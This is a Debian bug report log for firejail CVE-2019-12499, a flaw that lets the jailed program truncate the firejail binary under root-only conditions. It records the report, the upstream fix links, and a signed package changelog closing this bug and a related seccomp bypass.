firejail: CVE-2019-12499: binary can be truncated by root under certain conditions

Debian Bug report logs - #929733
firejail: CVE-2019-12499: binary can be truncated by root under certain conditions

Reply or subscribe to this bug.

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Reiner Herrmann <reiner@reiner-h.de>

To: submit@bugs.debian.org

Subject: firejail: binary can be truncated by root under certain conditions

Date: Wed, 29 May 2019 19:19:51 +0200

[Message part 1 (text/plain, inline)]

Source: firejail
Version: 0.9.58.2-1
Severity: important
Tags: security upstream pending fixed-upstream
Forwarded: https://github.com/netblue30/firejail/issues/2401
X-Debbugs-CC: team@security.debian.org

Firejail is affected by an issue similar to CVE-2019-5736.

Under certain conditions the firejail binary outside the jail
can be truncated [0]:

> * The sandbox must be running exploit code.
> * The sandbox must be running as root.
> * The sandbox parent is killed instantly by an unhandled signal, i.e. something different from SIGTERM (kill <pid>) or SIGINT (ctrl+c). This cannot be done from inside the sandbox (because of the pid namespace), and also it cannot be done from the outside without root privileges. As only root him/herself is able to kill the sandbox in this way, this kind of attack is not relevant with regards to Firejail's SUID property.

Which can also be exploited with firejail's --shutdown command:
> And that was wrong, --shutdown also had this problem (now fixed in shutdown.c)

I set severity to important, as it requires root privileges inside and outside
the jail to exploit it.

It is fixed in [1] (and amended in [2]), and in the new upstream release 0.9.60.
The earliest affected version is currently unknown.

I will upload the fix to unstable soon, together with #929732.

[0] https://github.com/netblue30/firejail/issues/2401
[1] https://github.com/netblue30/firejail/commit/fcba07c
[2] https://github.com/netblue30/firejail/commit/faa1ec7

[signature.asc (application/pgp-signature, inline)]

Message #10 received at 929733-close@bugs.debian.org (full text, mbox, reply):

From: Reiner Herrmann <reiner@reiner-h.de>

To: 929733-close@bugs.debian.org

Subject: Bug#929733: fixed in firejail 0.9.58.2-2

Date: Wed, 29 May 2019 19:33:31 +0000

Source: firejail
Source-Version: 0.9.58.2-2

We believe that the bug you reported is fixed in the latest version of
firejail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 929733@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Reiner Herrmann <reiner@reiner-h.de> (supplier of updated firejail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 29 May 2019 21:06:42 +0200
Source: firejail
Architecture: source
Version: 0.9.58.2-2
Distribution: unstable
Urgency: high
Maintainer: Reiner Herrmann <reiner@reiner-h.de>
Changed-By: Reiner Herrmann <reiner@reiner-h.de>
Closes: 929732 929733
Changes:
 firejail (0.9.58.2-2) unstable; urgency=high
 .
   * Cherry-pick security fix for seccomp bypass issue. (Closes: #929732)
     Seccomp filters were writable inside the jail, so they could be
     overwritten/truncated. Another jail that was then joined with the first
     one, had no seccomp filters applied.
   * Cherry-pick security fix for binary truncation issue. (Closes: #929733)
     When the jailed program was running as root, and firejail was killed
     from the outside (as root), the jailed program had the possibility to
     truncate the firejail binary outside the jail.
Checksums-Sha1:
 465593c08200ef411ce2efb628b62bd80e3b7cb8 2489 firejail_0.9.58.2-2.dsc
 62daa05a45c60c10b94fc3d03d29b4281a2d0713 13356 firejail_0.9.58.2-2.debian.tar.xz
 3afaf6ed7398611e20e6124c232f360eb0ea056f 5561 firejail_0.9.58.2-2_source.buildinfo
Checksums-Sha256:
 088a95f3ba986b97183b2654817e74c4c8659d9a9ad4a99dacfd8da74f48c73d 2489 firejail_0.9.58.2-2.dsc
 1e8aad6ea5cebea03fd96016a2d5be69c8b9fc72c782adf168d0dcdad8cc264e 13356 firejail_0.9.58.2-2.debian.tar.xz
 a532acf96c3d07ab05b0c001139d1e611a4d96ddb50d674ab71eb35964b2ea84 5561 firejail_0.9.58.2-2_source.buildinfo
Files:
 ecd8954cef22c1e8867682515b87c8fb 2489 utils optional firejail_0.9.58.2-2.dsc
 c54b379a0c10cb43da7db1ad7da49edb 13356 utils optional firejail_0.9.58.2-2.debian.tar.xz
 780d17157665f16ab58ff60cd549950d 5561 utils optional firejail_0.9.58.2-2_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE2Pb6feok2Q1urHM7zPBJKNsO6qcFAlzu2HAACgkQzPBJKNsO
6qew+w/+K3a5QQEFz5LRCJmukcWivg/lYjTqLdbeRz2tseSK1J2SVmLgFCWDbh7f
PXfKhnE28FvyPYNbDOFNVF72s9xlE4YgDMqLco8mLVtqlkLEGVGSv3ba3lDZ/GNt
QpSaqMYpSrg+QxfxOdmfZf/OTB+hwc52EIT4YQl8qA968ml5SlyBZyEZbF3VneJm
0FfctbHdJQO02v6pyXKI4ZSHsGLPE30A/5vwz7G9qr3fITAKn/V4ZhdBvH7hQPiZ
oCRl3M06PSaVw0l9OdbKJU+gRwXUVcVw0A5iyUEWVo8+Tzc9qaIXKujsXW5Wp97a
8tevQoU8yvO5gGggh+0FUVt8REm4yzuHg2aaLI4ymEq7dsHLKmAj4TIulUnYuPGL
1qk7c2Pjpb+F9wIqkzCKqND/VA7vLfhho6Rxv/ZtwXaJV3zGa+/rCAYlbBYgeh7a
GJjjmitcSbWutBrdKTB6cnGT7dPmDcCNwRhSO9fNwJzeUjnM6wALyvVQ8BepuXII
m9z9a8viE0i2l+Ka72Bu25QFCTsW5s93GO/W4ruw60/dgVOZmr4pNYEi2PB4eHuv
D8Uj8jk2hgcuuKgkLbZ0mqA6jEqpUnY3nUHnX84qpUD2fuOwcW6H7lfwDK+yY21s
JbLb1SMxxrDywHJrrHUYPESWfMiKpa0DgZj4B4mrFGqJ0uQLigY=
=3Unw
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.